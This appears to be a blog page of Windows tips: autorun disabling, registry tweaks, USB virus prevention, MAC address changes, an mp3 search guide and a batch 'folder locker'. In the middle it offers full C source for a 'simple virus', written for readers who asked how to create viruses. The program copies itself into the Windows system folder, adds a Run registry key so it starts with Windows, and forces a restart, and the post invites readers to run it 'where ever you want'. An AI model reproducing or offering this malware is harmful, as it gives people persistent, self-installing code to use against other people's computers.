Ahsun Taquveem Chohan

How to disable autorun(.inf) to prevent autorun Trojan
To disable Autorun system wide (for all users) on all the drives:
save the following script as .reg -file and double-click it (melt it with registry)

======================================================Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]"HonorAutoRunSetting"=dword:00000001"NoDriveTypeAutoRun"=dword:000000ff

=======================================================

Read more…

Share on Facebook

Many people asked me how to create viruses etc stuff. Here is a simple virus/program which will restart your computer when opened. All you have to do is compile it and then run it where ever you want. Don’t worry if you run it accidentally on your system, I’ll also tell you how to remove this virus from your system completely.

Source Code:

#include<stdio.h>

#include<dos.h>

#include<dir.h> /If you get error, try using direct.h, if still you get error try compiling it in windows xp

int found,drive_no;char buff[128];

void findroot()

{

int done;

struct ffblk ffblk; //File block structure

done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive

if(done==0)

{

done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not

if(done==0)

{

found=1; //means that the system is already infected

return;

}

drive_no=1;

return;

}

done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);

if

(done==0)

{

found=1;return;

}

drive_no=2;

return;

}

done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=3;

return;

}

done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);

if(done==0)

{

done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);

if(done==0)

{

found=1;

return;

}

drive_no=4;

return;

}

else

exit(0);

}

void main()

{

FILE *self,*target;

findroot();

if(found==0) //if the system is not already infected

{

self=fopen(_argv[0],”rb”); //The virus file open’s itself

switch(drive_no)

{

case 1:

target=fopen("C:\\windows\\system\\sysres.exe","welcome back"); //to place a copy of itself in a remote place

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\ sysres.exe"); //put this file to registry for starup

break;

case 2:

target=fopen("D:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dD:\\windows\\system\\sysres.exe");

break;

case 3:

target=fopen("E:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dE:\\windows\\system\\sysres.exe");

break;

case 4:

target=fopen("F:\\windows\\system\\sysres.exe","welcome back");

system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/dF:\\windows\\system\\sysres.exe");

break;

default:

exit(0);

}

while(fread(buff,1,1,self)>0)

fwrite(buff,1,1,target);

fcloseall();

}

else

system("shutdown -r -t 0"); //if the system is already infected then just give a command to restart

}

How to recover/remove the virus:

1) Open up PC in safe mode

2) C:\windows:\system … you will find it(sysres) so delete it !

3) open registry :

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

4) You will find it also delete it …

If anything else goes wrong, feel free to contact me

Share on Facebook

REGISTRY EDITINGS
To open Windows Registry:
1. Click Start and Run
2. type "regedit" (without quotes)

Configure Remote Access Client Account Lockout (Windows 2000/XP)
Configure Remote Access Client Account Lockout (Windows 2000/XP) You can use the remote access account lockout feature to specify how many times a remote access authentication has to fail against a valid user account before the user is denied access. Use this tweak to set the number of failed logins before the account is locked-out and the time before the lockout is reset.

 

 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteAccess\Parameters\AccountLockout

Disable the Ability to Right Click on the Desktop (All Windows)

This tweak removes the context menu that would normally appear when the user right clicks on the desktop or in the Explorer right results pane.

Open your registry and find or create the key below. Create a new DWORD value, or modify the existing value, called "NoViewContextMenu" and set it according to the value data below.

Exit your registry, you may need to restart or log out of Windows for the change to take effect.

 

User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]Value Name: NoViewContextMenuData Type: REG_DWORD (DWORD Value)Value Data: (0 = disabled, 1 = enabled

Read more…

Share on Facebook

Hello everyone,
I’ve seen many people having problem in searching.
Here are few tips/tricks how to search using Google

Searching Google for Music – Advanced Guide

This How-To will teach you how to use google to find mp3s. This How-To
will be highly pragmatic and will focus on the hows and not the
wherefores of the various search strings.

Index
———————————————————————-
0) Key
1) Directories
2) Xitami Servers
3) Directory Listing
4) Andromeda Servers
5) Zina Artists
6) Apache mp3 Servers
7) Individual Songs

Read more…

Share on Facebook

There are many ways to protect your computer against usb/flash viruses.

1.Don’t use usb/flash drives

If you will not use any usb/flash drive then there is no chance you will get usb/flash drive viruses.

2.Turn of auto play

You can do this by going to Run and type “gpedit.msc” (In windows vista press start menu + R to goto run), then press enter. Now goto

Computer Configuration > Administrative Templates > System

There you will see Turn off autoplay, double click on it and Enable it and select All drives

3.Always right click on usb/flash drive to open it.

Usb viruses executes when you double click on it, it run autorun.inf file hidden in usb, which executes the virus. So if you will never double click on the usb , there is no chance that you will get a virus.

4. Use script before accessing to usb/flash drive

I’ve created this script, which will delete autorun.inf file from your usb drive automatically, so if you will run this script, there is almost 95% chance that you will not get virus in your system.

Read more…

Share on Facebook

First of all , question is what is MAC address?

Mac address or media access control address, is a unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification. If assigned by the manufacturer, a MAC address usually encodes the manufacturer’s registered identification number. This is also known as physical address.

Now how to change MAC address?

Step1
Right click local area network choose support tab choose details.
Make a note of the Physical Address..
00-00-00-00-00-00..
The above is an example MAC address

Step 2
Read more…

Share on Facebook

Start your PC with the setup CD in a drive, and hit a key when you see the following screen:

Screen One
Boot from your XP setup CD to gain access to the no-reformat reinstall option.

Read more…

Share on Facebook

To Turn Your Computer Off In 5 Seconds
1. Open ‘Windows Task Manager’ (Ctrl+Alt+Del)
2. Click ‘Shutdown’ (at the top next to ‘Help’)
3. Then HOLD the ‘Ctrl’ key and Select ‘Turn Off’.
4. …5…4….3….2…1….You PC turns off immediately. I always do this when I’m in a rush etc.. It doesn’t effect the PC.

Share on Facebook

You can easily and effectively block access to a website by adding it to your Windows HOSTS file. Without any software. Doesn’t matter what browser that you use.
1.Go to your HOSTS file which is located at:
C:WINDOWSSYSTEM32DRIVERSETC for windows Vista and XP
C:WINNTSYSTEM32DRIVERSETC for Windows 2k
C:WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad.
Read more…

Share on Facebook

*Copy the following code

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

* Now paste it in notepad.

Read more…

Share on Facebook